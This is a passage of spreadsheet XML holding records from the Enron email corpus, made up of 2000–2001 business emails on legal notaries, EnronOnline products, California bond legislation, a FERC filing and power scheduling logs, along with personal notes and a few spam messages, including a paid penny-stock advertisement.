welcome your new hire to Enron and your business unit. Please contact your _x000D_
Human Resources representative if you have any question. _x000D_
_x000D_
Regards_x000D_
Frank </t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
As requested, your News Alert for YHOO_x000D_
follows from EquityAlert.com._x000D_
To edit/discontinue your alerts please refer to end of message._x000D_
PLEASE REVIEW THE NOTICE AND DISCLAIMER BELOW_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=3D-=3D-=3D-=3D-=3D Paid Advertisement -=3D-=_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
Looking for an emerging growth company expanding into China._x000D_
_x000D_
Search no more. Kanakaris Wireless (OTC BB: KKRS) recently signed_x000D_
a contract  to begin airing TV commercials in China, no later than_x000D_
Thanksgiving. This will have immediate impact on the 45 million_x000D_
per week viewing audience, because of the appeal of American_x000D_
television and movies._x000D_
_x000D_
For more information on the worldwide rollout, and its compelling_x000D_
impact on cinemapop.com, click here at_x000D_
http://205.210.134.51/a1.asp?ID=3D1268aa_x000D_
_x000D_
AOL USERS: copy &amp; paste the link above into your browser._x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
_x000D_
ChefShop.com Chosen as Best Food Site by Yahoo! Internet Life_x000D_
Magazine=0F=3DChefShop.com Supplants Tavolo.com to Be One of 13 Best Shoppi=_x000D_
ng Sites_x000D_
of 2000_x000D_
_x000D_
SEATTLE, Dec 13, 2000 /PRNewswire via COMTEX/ -- Yahoo! Internet Life has=_x000D_
=20_x000D_
named_x000D_
ChefShop.com the Best Food site on the Web. Yahoo! Internet Life evaluated_x000D_
hundreds of sites according to content, convenience, community, commerce an=_x000D_
d_x000D_
customer care. ChefShop.com beat out Yahoo's prior favorite site, Tavolo.co=_x000D_
m,_x000D_
and all other sites to be designated Best Food site of 2000._x000D_
_x000D_
Yahoo! Internet Life magazine chose ChefShop because of its superb inventor=_x000D_
y=20_x000D_
and_x000D_
exemplary customer service. Yahoo! likens ChefShop to "a gourmet boutique=_x000D_
=20_x000D_
filled_x000D_
with goodies that would excite even professional chefs."_x000D_
_x000D_
"Product descriptions are well-written, informative, succinct,_x000D_
fun-to-read-beating out Tavolo's by a taste bud," writes Leslie Brenner. "S=_x000D_
ite_x000D_
design is clean, attractive and intelligent, with a category list that rema=_x000D_
ins_x000D_
on the left side of the page as you browse, so it's always easy to go=20_x000D_
elsewhere_x000D_
in one click. The site also provides exemplary customer service, efficient_x000D_
handling of orders, and timely shipping at very reasonable prices."_x000D_
_x000D_
"ChefShop.com is thrilled to be chosen Best Food site on the Web by Yahoo!_x000D_
Internet Life," says ChefShop.com president and CEO Tim Mar. "ChefShop's=20_x000D_
mission_x000D_
is to share our passion for cooking and eating high-quality food. We offer=_x000D_
=20_x000D_
1,500_x000D_
imported and domestic hand-chosen, gourmet specialty foods and ingredients_x000D_
including vintage-dated olive oils, organic marmalades, artisan pastas and_x000D_
exotic teas. ChefShop believes strongly in our message -- Eat Simply, Eat=_x000D_
=20_x000D_
Well."_x000D_
_x000D_
About ChefShop.com_x000D_
_x000D_
ChefShop.com offers 1,500 of the finest quality artisan-produced gourmet=20_x000D_
foods,_x000D_
ingredients, and gifts hand-chosen from around the world. ChefShop.com also_x000D_
features weekly food articles highlighting cooking trends, entertaining,=20_x000D_
cooking_x000D_
advice, and seasonal information. ChefShop.com offers convenient, easy and_x000D_
secure online ordering from its website, or stop by our shop at 1435 Elliot=_x000D_
t_x000D_
Avenue West, in Seattle. Customers can also order via fax, 206-282-5607,=20_x000D_
phone,_x000D_
toll free, 877-337-2491, or email, shopkeeper@chefshop.com. This holiday=20_x000D_
season,_x000D_
"Eat Simply, Eat Well!"(TM)_x000D_
_x000D_
SOURCE ChefShop.com, Inc._x000D_
_x000D_
_x000D_
CONTACT:          Kristina Kolerich, 253-735-5620, or kkolerich@msn.com, or_x000D_
Wendy Ellis, 425-837-9305, or wendyruns@msn.com, both for ChefShop.com, Inc=_x000D_
._x000D_
_x000D_
URL:              http://www.chefshop.com_x000D_
http://www.prnewswire.com_x000D_
_x000D_
(C) 2000 PR Newswire.  All rights reserved._x000D_
_x000D_
-0-_x000D_
_x000D_
_x000D_
KEYWORD:          Washington_x000D_
INDUSTRY KEYWORD: FOD_x000D_
MLM_x000D_
REA_x000D_
_x000D_
_x000D_
_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=3D-=3D-=3D-=3D-=3D Paid Advertisement -=3D-=_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
Looking for an emerging growth company expanding into China._x000D_
_x000D_
For more information on the worldwide rollout, and its compelling_x000D_
impact on cinemapop.com, click here at_x000D_
http://205.210.134.51/a1.asp?ID=3D1269aa_x000D_
_x000D_
AOL USERS: copy &amp; paste the link above into your browser._x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=_x000D_
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D_x000D_
_x000D_
****************** TO EDIT YOUR EQUITY ALERTS ********************_x000D_
To unsubscribe or edit your alerts, visit_x000D_
http://www.equityalert.com/alerts.asp?uid=3Dalewis34&amp;xid=3D40352_x000D_
******************************************************************_x000D_
_x000D_
***IMPORTANT NOTICE AND DISCLAIMER REGARDING THIS COURTESY EMAIL**_x000D_
At your request, as a subscriber to our service, this email alert_x000D_
is being sent to you as a courtesy and is for information purposes_x000D_
only.  We are a financial news re-distributor.  We are not an_x000D_
investment advisory and do not purport to tell or suggest which_x000D_
companies you should monitor or which securities you should_x000D_
purchase or sell._x000D_
In addition to the information regarding the company you are_x000D_
monitoring (the =01&amp;Monitored Company=018), this email contains an_x000D_
advertisement describing a product, service or company for which we_x000D_
received a fee, at our normal advertising rates of $55 per 1,000 e-_x000D_
mails (subject to volume and other discounts), from the advertising_x000D_
company.  In addition, not withstanding our policy of prohibiting_x000D_
employees from buying or selling securities of an advertising_x000D_
company for a period of 20 days following dissemination of the_x000D_
advertisement, we may not be able to effectively monitor our_x000D_
employees to ensure compliance with the same. Consequently, there_x000D_
may be sales and/or purchases of such securities by our employees_x000D_
prior to, during and immediately following the dissemination of the_x000D_
advertisement._x000D_
Please note that (1) this email may not contain the full text of_x000D_
the press release issued by, or the research or other reports_x000D_
regarding, the Monitored Company; and (2) the text of the_x000D_
advertisement, the press release and/or reports were obtained from_x000D_
third party sources and were not written, generated or edited by_x000D_
us; accordingly, we make no representations or give any assurance_x000D_
as to the accuracy or completeness, nor have we conducted any_x000D_
independent investigations of, the disclosures regarding the_x000D_
subject matter of such releases and reports._x000D_
Please note that links to the advertising company and/or Monitored_x000D_
Company are provided for your convenience.  We assume no obligation_x000D_
for the content of such sites._x000D_
All information contained herein should be independently verified_x000D_
by you with the advertising company or with Monitored Company or_x000D_
any other sources you prefer._x000D_
[THIS IS ONLY A SUMMARY OF, AND IS QUALIFIED IN ITS ENTIRETY BY_x000D_
REFERENCE TO, THE =01&amp;EQUITYALERT SUBSCRIBER AGREEMENT AND_x000D_
DISCLAIMER.=018 PLEASE VISIT_x000D_
http://www.equityalert.com/home/disclaim.asp_x000D_
FOR ACCESS TO OUR COMPLETE DISCLAIMER]_x000D_
******************************************************************</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 07:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joya.davis@enron.com', 'travis.mccullough@enron.com', 'lance.schuler-legal@enron.com', 'stuart.zisman@enron.com', 'becky.tlucek@enron.com', 'sandi.braband@enron.com', 'janice.moore@enron.com', 'kaye.ellis@enron.com', 'brenda.whitehead@enron.com', 'brent.hendry@enron.com', 'taffy.milligan@enron.com', 'genia.fitzgerald@enron.com', 'bob.carter@enron.com', 'jeffrey.hodge@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'linda.simmons@enron.com', 'martin.penkwitz@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'peggy.banczak@enron.com', 'linda.noske@enron.com', 'dale.rasmussen@enron.com', 'anne.koehler@enron.com', 'sheila.tweed@enron.com', 'ann.white@enron.com', 'chaundra.woods@enron.com', 'richard.sanders@enron.com', 'roger.balog@enron.com', 'janet.moore@enron.com', 'teresa.bushman@enron.com', 'barton.clark@enron.com', 'barbara.gray@enron.com', 'elizabeth.sager@enron.com', 'lou.stoler@enron.com', 'shonnie.daniel@enron.com', 'laurie.mayer@enron.com', 'carolyn.george@enron.com', 'mark.taylor@enron.com', 'jenny.helton@enron.com', 'angela.davis@enron.com', 'john.viverito@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'mark.greenberg@enron.com', 'linda.guinn@enron.com', 'ed.iii@enron.com', 'dan.hyvl@enron.com', 'dan.lyons@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'shari.stack@enron.com', 'kay.young@enron.com', 'pat.radford@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'mary.heinitz@enron.com', 'james.grace@enron.com', 'janette.elbertson@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'tana.jones@enron.com', 'matt.maxwell@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'carol.clair@enron.com', 'kimberlee.bennick@enron.com', 'alan.aronowitz@enron.com', 'mary.ogden@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'peter.vecchio@enron.com', 'robert.bruce@enron.com', 'steve.hooser@enron.com', 'lisa.mellencamp@enron.com', 'samantha.boyd@enron.com', 'suzanne.adams@enron.com', 'mary.cook@enron.com', 'michelle.cash@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Notaries</t>
  </si>
  <si>
    <t>Attached is a list of Notaries in ENA Legal.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janette Elbertson_x000D_
Enron North America Corp._x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com</t>
  </si>
  <si>
    <t>Fri, 15 Sep 2000 07:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.taylor@enron.com', 'mark.evans@enron.com'})</t>
  </si>
  <si>
    <t>Re: EnronOnline New Markets/Products Weekly Update 9/8/00</t>
  </si>
  <si>
    <t xml:space="preserve">If you look at the attached list we are due to make a lot of these dates in _x000D_
the next two weeks.  The biggest problem in Europe is probably that Edmund is _x000D_
obviously out of the office and there are no dates even for his._x000D_
_x000D_
These delays are causing chicken and egg problems with the metals customers.  _x000D_
We can't mail if there are no pas etc.  The big metals roll-out is in London _x000D_
first week in October so we do need them by then,_x000D_
_x000D_
If there are re-prioritisation issues please contact Bruce Garner who needs _x000D_
them for that week._x000D_
_x000D_
Please let me know. _x000D_
_x000D_
Thanks_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Leonardo Pacheco@ENRON_x000D_
15/09/2000 11:46_x000D_
To: Louise Kitchen/HOU/ECT@ECT, David Forster/Corp/Enron@Enron, Bob _x000D_
Shults/HOU/ECT@ECT_x000D_
cc: Savita Puthigai/NA/Enron@Enron, Carlos Alatorre/NA/Enron@Enron, Naveed _x000D_
Ahmed/NA/Enron@Enron, Justin Rostant/HOU/ECT@ECT, Julie Ferrara/HOU/ECT@ECT, _x000D_
Amita Gosalia/LON/ECT@ECT, Dale Neuner/HOU/ECT@ECT _x000D_
_x000D_
Subject: EnronOnline New Markets/Products Weekly Update 9/8/00_x000D_
_x000D_
Attached please find the latest version  of the New Markets/Products Report. _x000D_
The report is updated every week._x000D_
_x000D_
Let me know if you have any questions_x000D_
_x000D_
Thank you!_x000D_
_x000D_
Leonardo Pacheco_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 02:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>expense reports</t>
  </si>
  <si>
    <t>I need to get expense reports in by the 13th of this month.  Have you given _x000D_
me all of your receipts for this year?  The only receipt I currently have to _x000D_
send in for reimbursement is your PrimeCo bill dated 11/15/00.  Is that it?  _x000D_
It looks like your December bill will have to be submitted after the cutoff _x000D_
date.</t>
  </si>
  <si>
    <t>Thu, 9 Aug 2001 18:39:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>those pesky little banks</t>
  </si>
  <si>
    <t>It was great to see you guys last night, the pasta was delicious and that was the best story I've heard in a long time. Thanks..we'll have you guys for dinner after we get rid of the cat urine odor._x000D_
 _x000D_
_x000D_
  _____  _x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com &lt;http://go.msn.com/bql/hmtag_itl_EN.asp&gt;</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 07:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vjw@cleanpower.org', 'smutny@iepa.com', 'mkahl@ka-pow.com', 'lga@mother.com', 'mdjoseph@adamsbroadwell.com', 'drothrock@camfg.com', 'wbooth@booth-law.com', 'jstewart@cmta.net', 'cra@calretailers.com', 'derek.naten@roche.com', 'isenberg@hmot.com', 'kmccrea@sablaw.com', 'debinorton@aol.com', 'john.redding@gene.ge.com', 'dominic.dimare@calchamber.com', 'mflorio@turn.org', 'brbarkovich@earthlink.net', 'ann.cohn@sce.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>Bond Leg Language, etc.</t>
  </si>
  <si>
    <t>Greetings:_x000D_
_x000D_
Hope everyone had a pleasant 4th._x000D_
_x000D_
I've read the respective Burton and Hertzberg language on amending AB 1X.  _x000D_
The Burton language looks cleaner and simpler, though there may be reasons to _x000D_
include some of the Hertzberg language, too._x000D_
_x000D_
I'm proposing to the group the following as potential amendments to the bond _x000D_
bill.  I would appreciate your feedback.  The amendments would be as follows:_x000D_
_x000D_
Customers who were on Direct Access when DWR started buying power (Jan. _x000D_
17th?), and are still on Direct Access when the bill passes, should be exempt _x000D_
from paying for the bonds. _x000D_
_x000D_
In short, customers should not be forced to pay for power twice--once from _x000D_
their ESP, and once from DWR.  Since these customers receive power services _x000D_
from their ESP, they never consumed DWR power in the first place and it _x000D_
wouldn't be fair to require them to pay for it._x000D_
_x000D_
Customers who have been utility customers since DWR started buying power but _x000D_
subsequently switched to Direct Access should only pay for power provided by _x000D_
DWR that they actually consumed, no more and no less.  _x000D_
_x000D_
For example, if a customer was a utility customer when DWR started buying _x000D_
power but switched to Direct Access on May 1st, then the customer would only _x000D_
be responsible for reimbursing DWR for power deliveries that took place from _x000D_
Jan. 17th thru April 30th._x000D_
_x000D_
I believe that we agreed on these concepts during the negotiations that took _x000D_
place over the past 4-5 weeks.  Or if we didn't explicitly agree during the _x000D_
talks, they seem to be principles on which we ought to be able to agree _x000D_
pretty easily now. And rather than leave the issue hanging, which can create _x000D_
unnecessary and costly uncertainty for customers, I suggest that we include _x000D_
very clear and simple legislative language in the bond bill clarifying what _x000D_
customers' obligations are.  Your thoughts are appreciated._x000D_
_x000D_
In addition, we have talked quite a bit about providing customers with _x000D_
incentives in the attempt to get California out of the energy hole that it _x000D_
finds itself in.  Providing (20KW and above) customers with an incentive to _x000D_
switch to Direct Access as soon as possible could 1) reduce the net short _x000D_
position that the state (and ultimately consumers) have to finance, thereby _x000D_
reducing spot purchases and price volatility,  2) reduce electricity _x000D_
purchasing costs, and 3) reduce the burden on the state budget._x000D_
_x000D_
With this in mind, I'm also proposing that the group consider an amendment to _x000D_
the bond bill that would exempt from bond charges any customer that switches _x000D_
to Direct Access by September 1st._x000D_
_x000D_
Finally, it seems odd that the language directing the PUC to suspend Direct _x000D_
Access is still in the bill.  If a dedicated rate component is created, that _x000D_
seems to eliminate altogether the need to suspend Direct Access.  And if _x000D_
that's the case, would it make sense to delete that language from the bill?_x000D_
_x000D_
Look forward to your comments and working with you to get support for and _x000D_
passage of the "core/noncore" proposal._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 6 Jul 2001 20:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">FYI -- David Leboe in Investor Relations authored the attachment._x000D_
-_x000D_
_x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 07/06/2001 03:54 PM ---------------------------_x000D_
From:	Greg Caudell/ENRON@enronXgate on 07/02/2001 01:53 PM_x000D_
To:	Christi L Nicolay/HOU/ECT@ECT_x000D_
cc:	 _x000D_
_x000D_
Subject:	Check this..._x000D_
_x000D_
I incorporated some comments and info provided by IR._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 15 Dec 2001 17:28:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ordermusic41@excite.com'})</t>
  </si>
  <si>
    <t>frozenset({'fans@ns.scs.es'})</t>
  </si>
  <si>
    <t>$10.00 off CD's DVD's                        MUW</t>
  </si>
  <si>
    <t>_x000D_
   [IMAGE]  [IMAGE]  [IMAGE]    [IMAGE]   [IMAGE]    [IMAGE]  [IMAGE]  [IMAGE]     This is a Flash Enabled Email. If you do not have flash, please download it here[IMAGE]      	_x000D_
_x000D_
_x000D_
We at Digital Citizen respect your online privacy. We have included contact information and a way for removal from our mailing list. If you wish to be removed from this list, please click here  and provide the address(es) to be deleted from our list. Any inconvenience caused is sincerely regretted</t>
  </si>
  <si>
    <t>Mon, 24 Jul 2000 11:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Rich Products</t>
  </si>
  <si>
    <t xml:space="preserve">looks good_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Peggy Mahoney_x000D_
07/24/2000 06:20 PM_x000D_
To: Mark Palmer/Corp/Enron@ENRON, Steven J Kean/HOU/EES@EES, Karen _x000D_
Denne/Corp/Enron@ENRON, Cedric Burgher/Corp/Enron@ENRON, Mark _x000D_
Koenig/Corp/Enron@ENRON, Paula Rieker/Corp/Enron@ENRON, Jeremy _x000D_
Blachman/HOU/EES@EES, Harold G Buchanan/HOU/EES@EES, Karen S Owens@ees@EES, _x000D_
Kevin Hughes/HOU/EES@EES, Mark S Muller/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, _x000D_
Marty Sunde/HOU/EES@EES, Dan Leff/HOU/EES@EES, Elizabeth Tilney/HOU/EES@EES, _x000D_
Dave S Laipple/DUB/EES@EES, James E Keller/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Rich Products_x000D_
_x000D_
Please review the attached draft news release about our agreement with Rich _x000D_
Products_x000D_
and let me know if you have any comments by 5pm Tuesday, July 25.  We are _x000D_
scheduled_x000D_
to release on Wednesday, July 26.  If you have any questions, please call me _x000D_
at x57034._x000D_
_x000D_
Rich Products is a major US food manufacturer headquartered in Buffalo, NY.  _x000D_
The company_x000D_
ranked #122 in Forbes Private 500 and has sales around $1.5 billion.  Rich _x000D_
Products is owned_x000D_
and operated by the founding Rich family.  Products manufactured include _x000D_
frozen meats,_x000D_
bakery products and non-dairy creamers._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 09:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/29/01; HourAhead hour: 17;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/29/01; HourAhead hour: 17;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Energy Import/Export schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042917.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 17 / Preferred:   0.00 / Final:   0.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/29/01_x000D_
  TIE_POINT: FCORNR_5_PSUEDO_x000D_
  INTERCHG_ID: EPMI_CISO_SCOUT_x000D_
  ENGY_TYPE: FIRM_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 07:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">yes, still on for dinner. 7:30pm is ok for me.  let know where and when.  I _x000D_
look forward to seeing you and Scott._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steve Pearlman@ENRON COMMUNICATIONS_x000D_
06/20/2000 10:39 AM_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Dinner_x000D_
_x000D_
Scott,_x000D_
_x000D_
Are we on for dinner?  I invited Scott Porter to join us - hope that is okay _x000D_
with you.  Any time from about 7:30 on is okay for me, but I would prefer _x000D_
later rather than earlier, because I have to run a few errands out in the _x000D_
direction of the Galeria after work.  Let me know._x000D_
_x000D_
Steve_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 30 May 2000 02:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: No longer with EOL Product Control</t>
  </si>
  <si>
    <t xml:space="preserve">Where are you going?!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Lisa Gillette_x000D_
	05/30/2000 09:46 AM_x000D_
		 _x000D_
		 To: Tom Moran/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Brant _x000D_
Reves/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Anthony _x000D_
Campos/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT, Leslie Hansen/HOU/ECT@ECT, _x000D_
Susan Flynn/HOU/ECT@ECT, Susan Bailey/HOU/ECT@ECT_x000D_
		 cc: EOL Call Center_x000D_
		 Subject: No longer with EOL Product Control_x000D_
_x000D_
Hello Everyone,_x000D_
_x000D_
Just wanted to inform you that I am leaving EnronOnline Operations as of June _x000D_
1st, 2000.  Please take my name off of your email distribution lists _x000D_
effective immediately.  Stephanie Sever will be taking over my _x000D_
responsibilities and handling all relevant issues.  I have enjoyed working _x000D_
with you all._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Lisa Gillette_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 14:28:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sue.nord@enron.com', 'rogers.herndon@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'm..landwehr@enron.com', 'luiz.maurer@enron.com', 'j..kean@enron.com', 'tom.hoatson@enron.com', 'sarah.novosel@enron.com', 'michael.roan@enron.com', 'f..calger@enron.com', 'don.black@enron.com', 'c..aucoin@enron.com', 'david.delainey@enron.com', 'richard.shapiro@enron.com', 'thane.twiggs@enron.com', 'jeff.brown@enron.com', 'narsimha.misra@enron.com', 'd..steffes@enron.com', 'louise.kitchen@enron.com', 'harry.kingerski@enron.com', 'howard.fromer@enron.com', 'm..presto@enron.com', 'daniel.allegretti@enron.com', 'janel.guerrero@enron.com', 'david.duran@enron.com', 'john.lavorato@enron.com'})</t>
  </si>
  <si>
    <t>Enron's FERC filing opposing icap</t>
  </si>
  <si>
    <t>_x000D_
Today at FERC, Enron filed a pleading requesting the complete elimination of "icap" as a product (including any "reserve type" products) based on the fact that the real time spot markets of the RTOS can effectively price this in the cost of energy.  The pleading also includes a proposed interim approach (with a two year sunset date).  This pleading was made in response to FERC's request for comments on "Ensuring Sufficient Capacity Reserves In Today's Energy Markets."_x000D_
_x000D_
The pleading and affidavit of Larry Ruff, PhD are attached.</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 07:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Steve, Maureen_x000D_
As per your request._x000D_
_x000D_
_x000D_
_x000D_
Alhamd Alkhayat_x000D_
ENRON CORP._x000D_
+1(713)853-0315</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mstiles@eqt.com'})</t>
  </si>
  <si>
    <t>Equitrans Pool</t>
  </si>
  <si>
    <t>Marianne,_x000D_
As per phone conversation, would you please send me the necessary forms to _x000D_
start a pool on Equitrans beginning August 1, 2000..  My mailing address is:_x000D_
_x000D_
John Singer_x000D_
Enron NA_x000D_
4150 Belden Village Street NW_x000D_
Suite LL3_x000D_
Canton, OH  44718_x000D_
_x000D_
Thanks for your help._x000D_
John</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 02:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'louise.kitchen@enron.com', 'kevin.hannon@enron.com', 'jeffrey.mcmahon@enron.com', 'raymond.bowen@enron.com', 'ken.rice@enron.com', 'jeffrey.shankman@enron.com', 'stanley.horton@enron.com', 'john.lavorato@enron.com', 'greg.whalley@enron.com', 'janet.dietrich@enron.com', 'david.delainey@enron.com', 'andrew.fastow@enron.com', 'mike.mcconnell@enron.com', 'michael.brown@enron.com', 'mark.frevert@enron.com', 'richard.causey@enron.com', 'james.hughes@enron.com', 'rebecca.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>RAC Website &amp; Portfolio Tracking System</t>
  </si>
  <si>
    <t xml:space="preserve">During the month of June, RAC will begin the rollout of our new website and=_x000D_
=20_x000D_
linked portfolio tracking system called PortRAC.  The website will provide=_x000D_
=20_x000D_
the user with instantly available transaction policies, procedures, DASH=01=_x000D_
,s=20_x000D_
and other valuable reports and links.  The PortRAC system is an extensive=_x000D_
=20_x000D_
database of merchant and strategic investment information combined with a=_x000D_
=20_x000D_
powerful search engine and report writer.  PortRAC will enable the analysis=_x000D_
=20_x000D_
of our investment portfolio in any fashion that the user specifies such as=_x000D_
=20_x000D_
the calculation of returns for a particular industry or region._x000D_
_x000D_
I believe that the new RAC website and PortRAC system will be valuable tool=_x000D_
s=20_x000D_
to help manage our business and I would like to provide you a personal =01&amp;=_x000D_
demo=018=20_x000D_
before we introduce these applications to a broader population._x000D_
_x000D_
In the next two weeks, Rick Carson will be contacting you to arrange a=20_x000D_
convenient time for the demo, which should take about 30 minutes.  I hope=_x000D_
=20_x000D_
that you will be able to make time in your schedule._x000D_
_x000D_
Please call me with any questions._x000D_
_x000D_
Rick Buy_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:06:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Osama Movie</t>
  </si>
  <si>
